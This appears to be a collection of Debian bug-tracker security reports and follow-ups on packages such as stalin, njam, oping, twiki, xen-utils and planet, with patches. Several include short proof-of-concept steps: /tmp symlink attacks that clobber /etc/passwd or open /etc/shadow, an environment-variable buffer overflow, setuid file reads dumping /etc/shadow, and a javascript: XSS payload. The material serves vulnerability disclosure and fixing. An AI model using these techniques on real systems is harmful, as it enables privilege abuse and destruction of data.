Bug#809252: node-cli: insecure use of temporary files
Package: node-cli Version: 0.4.4~20120516-1 Severity: critical Tags: security Dear Maintainer, The `node-cli` library makes insecure use of the following two temporary files: lock_file = '/tmp/' + cli.app + '.pid', log_file = '/tmp/' + cli.app + '.log'; These allow overwriting files that the starting-user has permission to modify. -- System Information: Debian Release: 8.2 APT prefers stable-updates APT policy: (500, 'stable-updates'), (500, 'stable') Architecture: amd64 (x86_64) Kernel: Linux 3.16.0-4-amd64 (SMP w/4 CPU cores) Locale: LANG=en_US.utf8, LC_CTYPE=en_US.utf8 (charmap=UTF-8) (ignored: LC_ALL set to en_US.UTF8) Shell: /bin/sh linked to /bin/dash Init: systemd (via /run/systemd/system)
Bug#808730: stalin: Insecure use of temporary files
Package: stalin Version: 0.11-5 Severity: critical Tags: security When `stalin` launches it attempts to detect its environment via the following code in /usr/lib/stalin/QobiScheme.sc: (system "uname -m >/tmp/QobiScheme.tmp") ... (system "rm -f /tmp/QobiScheme.tmp")) This is a prime example of the insecure use of temporary files, and allows overwriting any file owned by the user who invokes stalin. Trivial demonstration: $ ln -s /home/steve/HACK /tmp/QobiScheme.tmp $ ls -l /home/steve/HACK ls: cannot access /home/steve/HACK: No such file or directory Now run the sample code: $ cd /tmp/stalin-0.11/benchmarks $ ./make-hello And we see this: $ ls -l /home/steve/HACK -rw-r--r-- 1 steve steve 6 Dec 22 08:30 /home/steve/HACK -- System Information: Debian Release: 8.2 APT prefers stable-updates APT policy: (500, 'stable-updates'), (500, 'stable') Architecture: amd64 (x86_64) Kernel: Linux 3.16.0-4-amd64 (SMP w/4 CPU cores) Locale: LANG=en_US.UTF-8, LC_CTYPE=en_US.UTF-8 (charmap=UTF-8) (ignored: LC_ALL set to en_US.UTF8) Shell: /bin/sh linked to /bin/dash Init: systemd (via /run/systemd/system) Versions of packages stalin depends on: ii dpkg-dev 1.17.26 ii libc6 2.19-18+deb8u1 ii libgc-dev 1:7.2d-6.4 stalin recommends no packages. stalin suggests no packages. -- no debconf information Steve --
Bug#730189: ruby1.8: CVE-2013-4164
The patches seem to work successfully for me: * The test-suite that runs at compile-time still passes. * The reproducer stops segfaulting. The reproducer I'm using is: -- #!/usr/bin/ruby1.8 require 'json' JSON.parse([1.+1*30+]) -- Steve -- http://www.steve.org.uk/
Bug#651896: Acknowledgement (njam: Insecure usage of environmental variable)
Simple patch:
--- src/njam.cpp-orig 2011-12-13 17:06:04.0 +
+++ src/njam.cpp2011-12-13 17:07:08.0 +
@@ -339,7 +339,7 @@
sprintf(linux_sdl_driver, x11\0);
char *driver_name = getenv(SDL_VIDEODRIVER);
if (driver_name)
- sprintf(linux_sdl_driver, %s\0, driver_name);
+ snprintf(linux_sdl_driver, sizeof(linux_sdl_driver)-1, %s,
driver_name);
if (UseDGA)
{
Steve
--
http://edinburgh-portraits.com/
--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#651896: njam: Insecure usage of environmental variable
Package: njam Version: 1.25-5 Justification: user security hole Severity: grave Tags: security *** Please type your report below this line *** The setgid(games) binary /usr/games/njam makes insecure use of the environmental variable SDL_VIDEODRIVER. This potentially allows the execution of arbitrary code, as the following example shows: 1. Setup the variable: birthday:~# export SDL_VIDEODRIVER=$(perl -e print 'x'x300) 2. Launch the binary under gdb so we can see what happens: birthday:~# gdb /usr/games/njam (gdb) run Starting program: /usr/games/njam .. Program received signal SIGSEGV, Segmentation fault. 0x00404f48 in ?? () (gdb) bt 0 0x00404f48 in ?? () 1 0x7878787878787878 in ?? () 2 0x7878787878787878 in ?? () 3 0x7878787878787878 in ?? () 0x78 == x == Code execution via overflow. This is probably a minor issue, but should be simple to patch. -- System Information: Debian Release: 6.0.3 APT prefers stable APT policy: (500, 'stable') Architecture: amd64 (x86_64) Kernel: Linux 2.6.32-5-amd64 (SMP w/3 CPU cores) Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/dash Versions of packages njam depends on: ii libc62.11.2-10 Embedded GNU C Library: Shared lib ii libgcc1 1:4.4.5-8 GCC support library ii libsdl-image1.2 1.2.10-2+b2 image loading library for Simple D ii libsdl-mixer1.2 1.2.8-6.3 mixer library for Simple DirectMed ii libsdl-net1.21.2.7-2 network library for Simple DirectM ii libsdl1.2debian 1.2.14-6.1 Simple DirectMedia Layer ii libstdc++6 4.4.5-8 The GNU Standard C++ Library v3 njam recommends no packages. njam suggests no packages. -- no debconf information -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#553948: winkeydaemon: Symlink attack allows creation of arbitrary files
Package: winkeydaemon
Version: 1.0.1-3
Justification: user security hole
Severity: grave
Tags: security
*** Please type your report below this line ***
This is probably not a hugely exploitable issue, but reporting
regardless:
winkeydaemon.pl:
if (-d /tmp/.winkey) {
# ok, no action required
} else {
my $dir = /tmp/.winkey;
`mkdir $dir`;
if ($debug) {print Arranging mutex directory\n;}
}
...
...
`touch /tmp/.winkey/keyer_busy`;
...
`rm /tmp/.winkey/keyer_busy`;
...
-- System Information:
Debian Release: squeeze/sid
APT prefers unstable
APT policy: (500, 'unstable'), (1, 'experimental')
Architecture: amd64 (x86_64)
Kernel: Linux 2.6.30-1-amd64 (SMP w/2 CPU cores)
Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash
Versions of packages winkeydaemon depends on:
ii libdevice-serialport-perl 1.04-2+b1 emulation of Win32::SerialPort for
winkeydaemon recommends no packages.
winkeydaemon suggests no packages.
--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#548684: oping allows reading arbitrary files upon the local system - security issue
Package: oping Version: 1.3.2-1 Justification: user security hole Severity: grave Tags: security *** Please type your report below this line *** oping is setuid root and one of the command line arguments allows a configuration file to be specified. This file is read and *reported* to the console. (Unless the file contains contents which can be interpreted as a list of hostnames!) For example: s...@gold:~$ oping -f /etc/shadow Adding host `root:$1eluded/value:14368:0:9:7:::' failed: getaddrinfo: Name or service not known Adding host `daemon:*:13876:0:9:7:::' failed: getaddrinfo: Name or service not known Adding host `bin:*:13876:0:9:7:::' failed: getaddrinfo: Name or service not known Adding host `sys:*:13876:0:9:7:::' failed: getaddrinfo: Name or service not known Adding host `sync:*:13876:0:9:7:::' failed: getaddrinfo: Name or service not known Adding host `games:*:13876:0:9:7:::' failed: getaddrinfo: Name or service not known This is clearly a security hole - however the good news is that the version(s) of oping included in lenny and etch are unaffected. -- System Information: Debian Release: squeeze/sid APT prefers unstable APT policy: (500, 'unstable'), (1, 'experimental') Architecture: amd64 (x86_64) Kernel: Linux 2.6.30-1-amd64 (SMP w/2 CPU cores) Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/bash Versions of packages oping depends on: ii libc6 2.9-26 GNU C Library: Shared libraries ii liboping0 1.3.2-1C/C++ library to generate ICMP ECH oping recommends no packages. oping suggests no packages. -- no debconf information -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#546178: planet: [CVE-2009-2937] - Insufficient escaping of input feeds
On Fri Sep 18, 2009 at 13:38:39 +0200, Arnaud Fontaine wrote: I have prepared yesterday a package for Lenny including this patch. At the moment, I'm waiting for a reply from the debian-security team. Great. Don't forget etch to. Thank you very much for the patch and bug report. Did you see the followup discussion from Secunia about another planet-problem, relating to the handling of CDATA ? (To be honest if I were to re-do the patch now I'd probably do it the other way round : Make sure srcstarts with http: to cover other cases too.) Steve -- -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#546178: planet: [CVE-2009-2937] - Insufficient escaping of input feeds
On Fri Sep 18, 2009 at 14:06:44 +0200, Arnaud Fontaine wrote: No I didn't, I could not find this discussion, could you please point it me out? As soon as all these issues will have been addressed, I will prepare a package (debian-security team: please do not upload the package for now). Basically it comes down to CDATA and the handling of description This is the comment I received: -- please find attached the two reproducers for the CDATA thing. poc1.xml is not correctly filtered while poc2.xml is filtered, although they are nearly identical. If you edit the newly patched function to print the k and v values, you'll see that the attributes aren't passed through. -- Steve -- poc1.xml Description: XML document poc2.xml Description: XML document
Bug#546178: Updated patch
The patch doesn't account for case variations, so it shold be updated: + +for i in xrange (len (attrs)): +k,v = attrs[i] +if (( k == src ) or ( k == href ) ) and (v.lower().find(javascript: ) -1 ): +del attrs[i] + return attrs Steve -- http://www.steve.org.uk/ -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#546179: planet-venus: [CVE-2009-2937] - Insufficient escaping of input feeds
Subject: planet-venus: [CVE-2009-2937] - Insufficient escaping of input feeds
Package: planet-venus
Justification: user security hole
Severity: grave
Tags: security
*** Please type your report below this line ***
The planet feed aggregator attempts to remove malicious content from
user-submitted feeds. It does a great job, but fails to sanitize
this input:
img src=javascript:alert(1);
At least Opera will execute this code.
The package in Lenny is vulnerable and should require a
security update. Fixed packages are available from:
http://www.steve.org.uk/tmp/planet/lenny/
This is the patch I used, written by upstream:
s...@senfl:~$ diff --unified scrub.orig scrub.py
--- scrub.orig 2009-09-09 16:24:50.0 +
+++ scrub.py2009-09-09 16:25:18.0 +
@@ -128,5 +128,13 @@
node['value'] = feedparser._resolveRelativeURIs(
node.value, node.base, 'utf-8', node.type)
-node['value'] = feedparser._sanitizeHTML(
-node.value, 'utf-8', node.type)
+# Run this through HTML5's serializer
+from html5lib import html5parser, sanitizer, treebuilders
+from html5lib import treewalkers, serializer
+p = html5parser.HTMLParser(tokenizer=sanitizer.HTMLSanitizer,
+ tree=treebuilders.getTreeBuilder('dom'))
+doc = p.parseFragment(node.value, encoding='utf-8')
+xhtml = serializer.XHTMLSerializer(inject_meta_charset = False)
+walker = treewalkers.getTreeWalker('dom')
+tree = xhtml.serialize(walker(doc), encoding='utf-8')
+node['value'] = ''.join([str(token) for token in tree])
-- System Information:
Debian Release: squeeze/sid
APT prefers unstable
APT policy: (500, 'unstable'), (1, 'experimental')
Architecture: amd64 (x86_64)
Kernel: Linux 2.6.30-1-amd64 (SMP w/2 CPU cores)
Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash
--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#546178: planet: [CVE-2009-2937] - Insufficient escaping of input feeds
Subject: planet: [CVE-2009-2937] - Insufficient escaping of input feeds
Package: planet
Justification: user security hole
Severity: grave
Tags: security
*** Please type your report below this line ***
The planet feed aggregator attempts to remove malicious content from
user-submitted feeds. It does a great job, but fails to sanitize
this input:
img src=javascript:alert(1);
At least Opera will execute this code.
The packages in Etch and Lenny are vulnerable and should require a
security update. Fixed packages are available from:
http://www.steve.org.uk/tmp/planet/etch/
+
http://www.steve.org.uk/tmp/planet/lenny/
This is the patch I used:
--- planet-2.0.orig/planet/sanitize.py
+++ planet-2.0/planet/sanitize.py
@@ -70,6 +70,12 @@
# utility method to be called by descendants
attrs = [(k.lower(), v) for k, v in attrs]
attrs = [(k, k in ('rel', 'type') and v.lower() or v) for k, v in
attrs]
+
+for i in xrange (len (attrs)):
+k,v = attrs[i]
+if (( k == src ) or ( k == href ) ) and (v.find(javascript:
) -1 ):
+del attrs[i]
+
return attrs
def unknown_starttag(self, tag, attrs):
-- System Information:
Debian Release: squeeze/sid
APT prefers unstable
APT policy: (500, 'unstable'), (1, 'experimental')
Architecture: amd64 (x86_64)
Kernel: Linux 2.6.30-1-amd64 (SMP w/2 CPU cores)
Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash
--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#518122: Security issue in mantis
Package: mantis Severity: grave Tags: security Version: 1.1.6+dfsg-2 There's a security issue in the mantis version in lenny, at least, which allows registered users to run commands on the server. Details here: http://secunia.com/advisories/32314/ Patch here: http://mantisbt.svn.sourceforge.net/viewvc/mantisbt/branches/BRANCH_1_1_0/mantisbt/core/utility_api.php?r1=5679r2=5678pathrev=5679 Steve -- Stop blogforum spam http://blogspam.net/ -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#518122: Acknowledgement (Security issue in mantis)
Looks like I filed this too soon - the bug is fixed in Lenny's package already. Steve -- -- To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#509288: gnomad2: segfault on start up / vorbis comment headers
The patch below my sig is sufficient to fix the bug.
See here for more details:
http://blog.steve.org.uk/what_can_you_do__sparta_will_need_sons_.html
Steve
--
Managed Anti-Spam Service
http://mail-scanning.com/
s...@gold:/tmp$ diff --unified --ignore-space-change
gnomad2-2.9.1/src/tagfile.c gnomad2-2.9.1.orig/src/tagfile.c
--- gnomad2-2.9.1/src/tagfile.c 2007-10-17 19:47:39.0 +0100
+++ gnomad2-2.9.1.orig/src/tagfile.c2008-12-22 22:25:18.0 +
@@ -59,9 +59,15 @@
g_free(tmppath);
return;
}
- g_free(tmppath);
tag = taglib_file_tag(file);
+ if ( tag == NULL ) {
+g_printf(tags were null in file %s, tmppath);
+g_free(tmppath);
+return;
+ }
+ g_free(tmppath);
+
properties = taglib_file_audioproperties(file);
gchar* artist = taglib_tag_artist(tag);
--
To UNSUBSCRIBE, email to debian-bugs-rc-requ...@lists.debian.org
with a subject of unsubscribe. Trouble? Contact listmas...@lists.debian.org
Bug#494648: The possibility of attack with the help of symlinks in some Debian packages
On Wed Aug 13, 2008 at 11:31:54 +1000, Sven Dowideit wrote: I will have to assume that this report is indeed incorrect unless I hear otherwise. On my Debian Etch system: [EMAIL PROTECTED]:~$ apt-get source twiki Reading package lists... Done Building dependency tree... Done Need to get 4304kB of source archives. Get: 1 http://mirror.bytemark.co.uk etch/main twiki 1:4.0.5-9.1 (dsc) [639B] Get: 2 http://mirror.bytemark.co.uk etch/main twiki 1:4.0.5-9.1 (tar) [4264kB] Get: 3 http://mirror.bytemark.co.uk etch/main twiki 1:4.0.5-9.1 (diff) [39.3kB] Fetched 4304kB in 7s (546kB/s) gpg: Signature made Wed 21 Feb 2007 06:51:24 GMT using DSA key ID C0143D2D gpg: Can't check signature: public key not found dpkg-source: extracting twiki in twiki-4.0.5 dpkg-source: unpacking twiki_4.0.5.orig.tar.gz dpkg-source: applying ./twiki_4.0.5-9.1.diff.gz [EMAIL PROTECTED]:~$ cd twiki-4.0.5/ [EMAIL PROTECTED]:~/twiki-4.0.5$ grep /tmp/twiki debian/postinst if [ ! -e /tmp/twiki ]; then mkdir /tmp/twiki chmod 777 /tmp/twiki chown $TWIKI_OWNER.www-data /tmp/twiki [EMAIL PROTECTED]:~/twiki-4.0.5$ So : 1. If /tmp/twiki doesn't exist it is made as a directory. 2. If it does exist its permissions are changed - unconditionally Let me exploit it: [EMAIL PROTECTED]:~$ [EMAIL PROTECTED]:~$ ln -s /etc/shadow /tmp/twiki [EMAIL PROTECTED]:~$ sudo apt-get install twiki Password: Reading package lists... Done Building dependency tree... Done The following extra packages will be installed: libalgorithm-diff-perl liblocale-maketext-lexicon-perl libtext-diff-perl rcs Suggested packages: ... ... Setting up libtext-diff-perl (0.35-2) ... Setting up rcs (5.7-18) ... Setting up twiki (4.0.5-9.1) ... Adding password for user TWikiGuest Reloading web server config...3224 Now what happened? Nothing. The directory /tmp/twiki was created and my symlink wasn't touched. So we look safe. But I'm not convinced. I know that I can coerce it into working: [EMAIL PROTECTED]:~$ sudo rm -rf /tmp/twiki [EMAIL PROTECTED]:~$ ln -s /etc/shadow /tmp/twiki [EMAIL PROTECTED]:~$ sudo /var/lib/dpkg/info/twiki.postinst configure Reloading web server config...3224 . [EMAIL PROTECTED]:~$ ls -l /etc/shadow -rwxrwxrwx 1 www-data www-data 1093 2008-08-13 10:35 /etc/shadow I guess the difference is relating to the presence, or not, of /var/lib/twiki/data ? Looks like merely installing the package wouldn't trigger this, but an upgrade might. Or something like that ! Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#494648: The possibility of attack with the help of symlinks in some Debian packages
On Wed Aug 13, 2008 at 22:51:00 +1000, Sven Dowideit wrote: no, its got nothing to do with /var/lib/twiki/data etc, its the location for session data - produced by CGI::Session etc. Yes it does. The code we're talking about is contained in the file debian/postinst, and only executes under the following condition: # create initial htpasswd, if needed if [ -e /var/lib/twiki/data ]; then ... ... #create securer-twiki session dir mkdir ... fi My understanding of the discussion thus far is: a. This is a genuine bug. b. Which has been fixed. c. Except in Etch. Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#489756: poppler CVE-2008-2950 in etch
On Wed Jul 09, 2008 at 12:04:01 +0200, Wichert Akkerman wrote: I see CVE-2008-2960 reported in the BTS as #489756 but I see no mention of a fix for stable. Is someone working on a DSA for stable? There isn't one in progress. Tonight there will be a release of an update to handle CVE-2008-1693. I guess that will be the next one. Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#480059: vorbis-tools vulnerable to CVE-2008-1686
On Wed May 07, 2008 at 18:12:09 -0400, Jamie Strandboge wrote: vorbis-tools contains embedded speex code, and although vorbis-tools is linked to libspeex, it compiles the vulnerable code. Attached is a debdiff that Ubuntu is using in its 1.1.1 versions of vorbis-tools (fuzz removed). I'd rather see a patch that makes the vorbis-tools link against the system-wide library, and not compile the vulnerable code at all. Would it be possible for you to provide such a thing, or is that too hard? Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#464756: kazehakase security fix patch
On Tue Apr 15, 2008 at 21:36:13 -0400, Andres Salomon wrote: Cool. The package is here: http://people.debian.org/~dilinger/security/kazehakase/etch/ I will give it a bit more testing later on tonight. Thanks. I'll upload this tomorrow. I assume this will be handled in the same way for Lenny / Sid? Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#464756: kazehakase security fix patch
On Tue Apr 15, 2008 at 15:46:02 -0400, Andres Salomon wrote: I'd rather see kaz linked against the system's pcre; it's much easier to deal w/. Does the security team agree? Definitely! Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#475747: tss: Allows reading arbitary files
Package: tss Version: 0.8.1-3 Severity: grave Justification: user security hole Tags: security *** Please type your report below this line *** Due to poor permission checking the tss binary allows local users to read arbitrary files upon the system. For example the following reveals the contents of the /etc/shadow file: [EMAIL PROTECTED]:~$ tss -a /etc/shadow The code *should* drop privileges prior to opening any files, or failing that should stat() the file to ensure the caller may view it. -- System Information: Debian Release: lenny/sid APT prefers unstable APT policy: (500, 'unstable'), (1, 'experimental') Architecture: amd64 (x86_64) Kernel: Linux 2.6.18-4-xen-amd64 (SMP w/2 CPU cores) Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/bash Versions of packages tss depends on: ii libc6 2.7-10 GNU C Library: Shared libraries ii libncurses5 5.6+20080405-1 Shared libraries for terminal hand tss recommends no packages. -- no debconf information Steve -- Managed Anti-Spam Service http://mail-scanning.com/ -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#468050: Security problems present in xwine
Package: xwine Version: 1.0.1-1.1 Severity: grave Justification: user security hole Tags: security *** Please type your report below this line *** I'd urge for the removal of this package from Lenny/Sid because of bug 460783 + this one... xwine contains two flaws: 1. Insecure use of temporary files. 2. Broken permissions on /etc/wine/config Printing uses the static file '/tmp/temporaire' for spooling into with no sanity checks, then this: ./w_editeur.c: system(cat /tmp/temporaire | lp ); ./w_editeur.c: system(rm -f /tmp/temporaire); The second issue is more interesting. The global wine configuration file is abused thusly: ./w_export.c: system(cp -f ~/.wine/config /etc/wine/); ./w_export.c: system(chmod 666 /etc/wine/config); I guess for this to work the program must be started by root, but if the permissions are 0666 then any user may edit the file and cause DOS for local users. I'm not horribly familiar with Window configuration, but it does seem like you could cause arbitrary code to run when a local user invokes wine, and prints, via a configuration file like this: /etc/wine/config: [spooler] FILE: = tmp.ps LPT1: = |/tmp/bogus-spooler.lpr Mitigating circumstances are that these days Wine ignores /etc/wine/config ~/.wine/config. Instead this information is stored in the wine registry which actually renders this package pointless for etch+ Steve -- System Information: Debian Release: lenny/sid APT prefers unstable APT policy: (500, 'unstable'), (1, 'experimental') Architecture: amd64 (x86_64) Kernel: Linux 2.6.18-4-xen-amd64 (SMP w/2 CPU cores) Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8) Shell: /bin/sh linked to /bin/bash -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#464058: [horde-vendor] Bug#464058: turba access checking issue
On Thu Feb 21, 2008 at 02:41:41 +0100, Gregory Colpart wrote: The package turba2 has vulnerabilities (See CVE-2008-0807, bug #464058 and changelogs of fixed sarge/etch packages). A shining example of how to handle security updates. Thanks very very much for the fixed packages, and the clear writeup. Ill upload them today, and handle the release when they are done. Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#452518: security.debian.org: Error update samba_3.0.24-6etch5_i386.deb
On Fri Nov 23, 2007 at 12:25:42 +, Domijor wrote: Today I updated with aptitude the package samba to the version samba_3.0.24-6etch5_i386.deb. I have PDC server with Samba. The cliente don't connect to server. The cliente connect with smbfs. The log of system is: The package introduced a regression affecting some users. An update is pending, in the meantime you can find fixed packages here: http://people.debian.org/~vorlon/samba/ Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#452515: security.debian.org: Error update samba_3.0.24-6etch5_i386.deb
On Fri Nov 23, 2007 at 12:02:59 +, Error update samba_3.0.24-6etch5_i386.deb wrote: Today I updated with aptitude the package samba to the version samba_3.0.24-6etch5_i386.deb. I have PDC server with Samba. The cliente don't connect to server. The cliente connect with smbfs. The log of system is: The package introduced a regression affecting some users. An update is pending, in the meantime you can find fixed packages here: http://people.debian.org/~vorlon/samba/ Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#446354: OpenBSD patch for CVE-2007-5365 is insufficient
On Mon Oct 29, 2007 at 19:33:17 +0100, Tomas Hoger wrote: During testing of our updated dhcp packages, we have found out that patch for CVE-2007-5365 used by OpenBSD was not sufficient and it was still possible to crash dhcpd. Your dhcp packages released in DSA 1388-1 also seem affected. You can find better patch based on dhcp-3.x code here: https://bugzilla.redhat.com/show_bug.cgi?id=327781#c5 Note: [EMAIL PROTECTED] was notified on 2007-10-23. Updated DSA 1388-3 released on 2007-10-29. Thanks, we have a built package already. I'm not sure who is releasing it - I guess I should since I did the previous one. I'll chase it tomorrow/wednesday. Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#447795: xen-utils-3.0.3-1: [CVE-2007-3919] xenmon.py / xenbaked insecure file accesss
Package: xen-utils-3.0.3-1 Version: 3.0.3-0-3 Severity: grave Tags: security Justification: user security hole Xen versions 3.x, and 3.1 contain a tool for processing Xen trace buffer information. This tool uses the static file /tmp/xenq-shm insecurely allowing a local user to truncate any local file when xenbaked or xenmon.py are invoked by root. Sample session: # setup. [EMAIL PROTECTED]:~$ ln -s /etc/passwd /tmp/xenq-shm # later. [EMAIL PROTECTED]:~$ sudo xenbaked # all gone. :( [EMAIL PROTECTED]:~$ ls -l /etc/passwd -rw-r--r-- 1 0 root 327680 2007-10-17 00:14 /etc/passwd This flaw is known as CVE-2007-3919 by the common vulnerabilities and exposures project. As the filename needs to be shared between xenmon.py + xenbaked.c a random one cannot easily be generated. The solution that Debian will use for its security update is to create the file in a location which is only writable by root - /var/run. Security advisory will be released very soon. Steve -- -- System Information: Debian Release: 4.0 APT prefers stable APT policy: (500, 'stable') Architecture: amd64 (x86_64) Shell: /bin/sh linked to /bin/bash Kernel: Linux 2.6.18-5-xen-amd64 Locale: LANG=en_GB, LC_CTYPE=en_GB (charmap=ISO-8859-1) Versions of packages xen-utils-3.0.3-1 depends on: ii iproute20061002-3Professional tools to control the ii libc6 2.3.6.ds1-13etch2 GNU C Library: Shared libraries ii libncurses55.5-5 Shared libraries for terminal hand ii python 2.4.4-2 An interactive high-level object-o ii python-central 0.5.12register and build utility for Pyt ii udev 0.105-4 /dev/ and hotplug management daemo ii xen-utils-common 3.0.3-0-2 XEN administrative tools - common ii zlib1g 1:1.2.3-13compression library - runtime Versions of packages xen-utils-3.0.3-1 recommends: ii bridge-utils 1.2-1 Utilities for configuring the Linu ii xen-hypervisor-3.0.3-1-amd64 3.0.3-0-3 The Xen Hypervisor on AMD64 -- no debconf information -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#446354: dhcp: stack-based buffer overflow (CVE-2007-5365)
On Fri Oct 12, 2007 at 22:51:24 +1000, Steffen Joeris wrote: A patch is attached below. Please tell me, if you want to take care of it or if i should upload. Thanks for the patch, I will upload with it. Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#441555: lighttpd: header overflow when using the mod_fastcgi extension
On Mon Sep 10, 2007 at 13:41:10 +0200, Stefan Andersson wrote: Package: lighttpd Version: 1.4.13-4etch1 Severity: critical Tags: security Justification: arbitrary code execution Fixed already in DSA-1362. Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#436701: CVE-2007-1614: DoS and execution of arbitary code
On Thu Aug 09, 2007 at 01:07:47 +1000, Steffen Joeris wrote: Package: zziplib Severity: grave Tags: security Justification: user security hole Hi The following CVE[0] has be issued against zziplib. This seems to be a low-risk, from the one page I found describing it: http://www.securitylab.ru/forum/read.php?FID=21TID=40858MID=326187#message326187 Basically zzcat $longfilename crashes. I wouldn't have thought this would require a DSA. Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#435735: CVE-2007-3791: Buffer overflow in policyd
On Thu Aug 02, 2007 at 23:34:10 +0200, Stefan Fritsch wrote: Package: postfix-policyd Version: 1.80-2.1 Severity: grave Tags: security Justification: user security hole A vulnerability has been found in policyd. From CVE-2007-3791: Building now. Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#396360: Maybe time for DSA?
On Sat Jul 28, 2007 at 11:18:54 +0300, Touko Korpela wrote: This bug has patch included, maybe security team could do upload? The code in Etch already contains this patch... I've not had a chance to check sarge yet, but I'm thinking that we're OK. Steve -- # The Debian Security Audit Project. http://www.debian.org/security/audit -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#434888: Multiple vulnerabilities [CVE-2007-3946] [CVE-2007-3947] [CVE-2007-3948] [CVE-2007-3949] [CVE-2007-3950]
On Fri Jul 27, 2007 at 09:11:48 -0500, Adam Majer wrote: Package: lighttpd Severity: critical Tags: security Upstream patches from Trac seem to be available from upstream. Still waiting on CVE IDs. I can upload without them, but I'd rather not .. Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#428368: lighttpd vuln patch
This one isn't going to get released as-is, as there are a couple more pending issues with lighttpd. I'll roll them all up once I have valid identifiers for them. Steve -- # The Debian Security Audit Project. http://www.debian.org/security/audit -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#434546: lighttpd: 1.4.16 has been released and contains security fixes
On Tue Jul 24, 2007 at 21:14:31 +0200, Olaf van der Spek wrote: Lighttpd 1.4.16 has been released and contains security fixes, see http://www.lighttpd.net/2007/7/24/1-4-16-let-s-ship-it A release is in preperation, just waiting on CVE IDs. We have one .. Steve -- -- To UNSUBSCRIBE, email to [EMAIL PROTECTED] with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]
Bug#428368: lighttpd vuln patch
